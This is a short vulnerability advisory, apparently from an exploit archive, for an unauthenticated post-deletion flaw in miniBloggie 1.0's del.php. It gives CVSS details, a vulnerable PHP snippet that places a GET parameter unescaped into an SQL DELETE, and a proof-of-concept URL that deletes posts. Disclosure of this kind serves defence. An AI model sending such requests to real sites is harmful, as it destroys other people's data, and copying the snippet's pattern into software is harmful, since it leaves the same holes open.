miniBloggie 1.0 (del.php) Arbitrary Delete Post Vulnerability

2009.04.11
Credit: Cod3rZ
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# MiniBloggie Arbitrary Delete Post Vulnerability # Author: Cod3rZ # Site: http://cod3rz.helloweb.eu # PoC: # if (isset($_GET['post_id'])) $post_id = $_GET['post_id']; # if (isset($_GET['confirm'])) $confirm = $_GET['confirm']; # [...] # elseif ($confirm=="yes") { # [...] # $sql = "DELETE FROM blogdata WHERE post_id=$post_id"; # $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error()); # Vuln: http://site/del.php?post_id=[postid]&confirm=yes # Ex: http://127.0.0.1/del.php?post_id=1&confirm=yes # Visit http://devilsnight.altervista.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top